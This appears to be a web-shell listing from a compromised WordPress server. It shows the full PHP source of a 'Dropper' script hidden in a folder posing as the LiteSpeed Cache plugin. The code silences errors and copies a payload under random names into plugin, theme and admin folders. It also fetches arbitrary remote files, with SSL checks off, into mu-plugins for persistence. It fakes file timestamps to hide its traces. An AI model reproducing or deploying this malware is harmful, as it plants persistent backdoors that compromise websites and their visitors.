| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/mosrembit/data/www/mosrembit.ru/wp-content/plugins/litespeedcache/ |
Upload File : |
<?php
// Stealth - no error output
error_reporting(0);
@ini_set('display_errors', 0);
class Dropper {
private $wp_root;
private $directorists = [];
private $message = [
'message' => 'Unknown error',
'data' => []
];
public function __construct() {
$this->wp_root = $this->detectWordpressRoot();
if ($this->wp_root) {
$this->directorists = $this->scanDirectories();
}
}
private function detectWordpressRoot() {
$candidates = [
dirname(__FILE__, 3),
dirname(__FILE__, 4),
dirname(__FILE__, 5),
$_SERVER['DOCUMENT_ROOT'] ?? '',
getcwd(),
];
foreach ($candidates as $dir) {
$dir = rtrim($dir, '/\\');
if ($dir && (file_exists("$dir/wp-load.php") || file_exists("$dir/wp-includes/version.php"))) {
return $dir;
}
}
return false;
}
private function scanDirectories() {
$groups = [
'plugins' => 'wp-content/plugins',
'themes' => 'wp-content/themes',
'languages' => 'wp-content/languages',
];
$result = [];
foreach ($groups as $key => $rel) {
$path = rtrim($this->wp_root, '/\\') . '/' . $rel;
if (!is_dir($path)) continue;
$dirs = [];
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $file) {
if ($file->isDir()) {
$dirs[] = $file->getPathname();
}
}
$result[$key] = $dirs;
}
$admin_path = rtrim($this->wp_root, '/\\') . '/wp-admin';
if (is_dir($admin_path)) {
$result['admin'] = [$admin_path];
}
return $result;
}
public function execute() {
$params = array_merge($_GET, $_POST);
$action = strtolower(trim($params['action'] ?? ''));
$dir_type = trim($params['dir'] ?? 'plugins');
$filename = trim($params['filename'] ?? '');
$url = trim($params['url'] ?? '');
$num = max(1, min(10, (int)($params['num'] ?? 2)));
$random = isset($params['random_name']) || !empty($params['is_random']);
if (!$action) {
$this->message['directorist'] = array_keys($this->directorists);
$this->message['message'] = 'Nothing to do??';
$this->finish();
return;
}
if ($action === 'copy') {
if (!$filename) {
$this->message['message'] = 'Parameter "filename" is required';
$this->finish();
return;
}
$source = $filename;
if (!file_exists($source) && !preg_match('#^/#', $filename) && !preg_match('#^[a-z]:#i', $filename)) {
$source = __DIR__ . '/' . $filename;
}
if (!file_exists($source) || !is_file($source)) {
$this->message['message'] = 'Source file not found: ' . htmlspecialchars($filename);
$this->finish();
return;
}
$target_dirs = $this->directorists[$dir_type] ?? [];
if (empty($target_dirs)) {
$this->message['message'] = "No directories found in group: $dir_type";
$this->finish();
return;
}
$copied = [];
for ($i = 0; $i < $num; $i++) {
$dest_dir = $target_dirs[array_rand($target_dirs)];
$dest_dir = rtrim($dest_dir, '/\\');
$new_name = $random
? $this->randomName(6, 12) . '.php'
: basename($filename);
$destination = $dest_dir . '/' . $new_name;
if (@copy($source, $destination)) {
$this->setFakeTimestamps($destination);
$this->setFakeTimestamps($dest_dir);
$copied[] = $this->nicePath($destination);
}
}
if ($copied) {
$this->message['data'] = $copied;
$this->message['message'] = 'Files copied';
$this->message['count'] = count($copied);
} else {
$this->message['message'] = 'Copy failed (permissions?)';
}
$this->finish();
return;
}
if ($action === 'download') {
if (!$url) {
$this->message['message'] = 'Parameter "url" is required';
$this->finish();
return;
}
$filename = $_REQUEST['filename'];
$downloader = new Req($url);
$content = $downloader->makeRequest();
if ($content === false && strlen($content) < 1) {
$this->message['download'] = false;
$this->message['message'] = 'Download failed or content too small';
$this->finish();
return;
}
$dest_dir = $_REQUEST['dir'];
if($dest_dir == "mu") {
$dest_dir = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/mu-plugins';
if(!file_exists($dest_dir)) {
mkdir($dest_dir);
$this->setFakeTimestamps($dest_dir);
}
}else if(empty($dest_dir)) {
$dest_dir = './';
}else{
$dest_dir = $dest_dir;
}
$destination = $dest_dir . '/' . $filename;
$saved = $this->saveContentToFile($destination, $content);
$this->setFakeTimestamps($destination);
$this->message['download'] = true;
$this->message['put'] = $saved;
if ($saved) {
$this->message['data'] = [$this->nicePath($destination)];
$this->message['message'] = 'File downloaded and saved';
$this->message['saved_as'] = $this->nicePath($destination);
} else {
$this->message['message'] = 'Download OK but failed to save file';
}
$this->finish();
return;
}
$this->message['message'] = 'Unsupported action';
$this->finish();
}
private function saveContentToFile($path, $content) {
$bytes = @file_put_contents($path, $content);
if ($bytes !== false && file_exists($path) && filesize($path) > 10) {
$this->setFakeTimestamps($path);
return true;
}
$fp = @fopen($path, 'a');
if ($fp) {
@fwrite($fp, $content);
@fclose($fp);
$this->setFakeTimestamps($path);
return true;
}
return false;
}
private function randomName(int $min = 6, int $max = 12): string {
$chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
$len = mt_rand($min, $max);
return substr(str_shuffle(str_repeat($chars, $len)), 0, $len);
}
private function setFakeTimestamps(string $path): void {
if (!file_exists($path)) return;
$offset = mt_rand(86400 * 7, 86400 * 365);
$time = time() - $offset;
@touch($path, $time, $time);
}
private function nicePath(string $path): string {
if (strpos($path, $this->wp_root) === 0) {
return ltrim(substr($path, strlen($this->wp_root)), '/\\');
}
return $path;
}
private function finish() {
header('Content-Type: application/json; charset=utf-8', true);
echo json_encode($this->message, JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_IGNORE);
exit;
}
}
class Req {
private $url;
public function __construct($url) {
$this->url = $url;
}
public function makeRequest() {
if (function_exists('curl_init')) {
return $this->tryCurl();
}
return $this->tryFileGetContents();
}
private function tryCurl() {
$ch = curl_init($this->url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 20,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
]);
$data = curl_exec($ch);
curl_close($ch);
return $data !== false ? $data : $this->tryFileGetContents();
}
private function tryWpRemote() {
$resp = wp_remote_get($this->url, ['timeout' => 20, 'sslverify' => false]);
return is_wp_error($resp) ? false : wp_remote_retrieve_body($resp);
}
private function tryFileGetContents() {
$ctx = stream_context_create([
'http' => ['timeout' => 20],
'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
]);
return @file_get_contents($this->url, false, $ctx) ?: false;
}
}
// Run
$dropper = new Dropper();
$dropper->execute();